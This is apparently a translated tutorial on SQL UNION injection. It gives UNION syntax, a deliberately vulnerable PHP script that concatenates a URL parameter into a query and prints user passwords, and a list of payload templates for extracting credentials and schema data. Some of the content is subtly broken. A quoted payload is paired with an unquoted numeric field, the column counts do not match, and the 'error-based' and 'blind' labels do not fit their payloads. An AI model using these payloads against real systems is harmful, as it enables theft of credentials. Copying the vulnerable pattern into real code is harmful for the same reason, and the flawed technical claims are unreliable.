Table of contents
union injection
1. Grammar introduction:
Version:
The union function is an operator in the SQL language, which is used to combine two or more query results into a result set. It works with almost all major relational database management systems (RDBMS)
Like all: MySQL, Oracle, Microsoft SQL Server, PostgreSQL, SQLite and other relational databases
grammar:
SELECT column1, column2 FROM table1
UNION
SELECT column1, column2 FROM table2;Use the SELECT statement to query data in two or more tables. Then, use the UNION keyword to combine the results of these queries together
(Note: The merged query results have the same number of columns and similar data types. If the query results have different numbers of columns or incompatible data types, an error will result)
effect:
- Combined result sets: When we need to combine multiple query results into one result set, we can use the union function. This simplifies query operations and reduces code complexity.
- Deduplicate data: The union function will automatically deduplicate, that is, duplicate rows will be removed from the result set, and only unique rows will be returned. This is useful when you need to merge data from two or more tables and eliminate duplicate data.
- Extended query: Use the union function to combine multiple query results together to expand the scope of the query. We can use different conditions and filters in each SELECT statement to fetch data from different tables and combine them into one result set
2. Code example
Example:
<?php
// 获取用户输入
$id = $_GET['id'];
// 构造SQL查询语句
$sql = "SELECT * FROM users WHERE id = " . $id;
// 执行SQL查询
$result = mysqli_query($conn, $sql);
// 处理查询结果
if ($result) {
// 输出查询结果
while ($row = mysqli_fetch_assoc($result)) {
echo "用户名: " . $row['username'] . "<br>";
echo "密码: " . $row['password'] . "<br>";
}
} else {
// 输出错误信息
echo "查询失败";
}
?>
idThe user can specify the user ID to be queried through the parameters in the URL . However, since there is no $idfiltering or validation done in the code, an attacker can idinject malicious SQL code in the parameters.
Parameters can be id的injected into malicious code, as follows
1' UNION SELECT username, password FROM users--Then the constructed SQL query statement will become:
SELECT * FROM users WHERE id = 1' UNION SELECT username, password FROM users--'
Will return the username and password of all users, bypassing the original query condition
Obtain sensitive information through joint injection vulnerabilities, or perform other malicious operations
payload:
1. Union injection based on joint query:
' UNION SELECT column1, column2, column3 FROM table_name--2. Error-based union injection:
' UNION ALL SELECT NULL, NULL, NULL, table_name FROM information_schema.tables--3. Union injection based on blind injection:
' UNION ALL SELECT NULL, (SELECT concat(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name='表名' LIMIT 1 OFFSET 0)#4. Union injection based on stacked query:
'; SELECT 1,2,3 UNION ALL SELECT column1, column2, column3 FROM table_name--…………
Every method of sql injection can try to combine with union
Network Security O
GitHub - BLACKxZONE/Treasure_knowledge
https://github.com/BLACKxZONE/Treasure_knowledge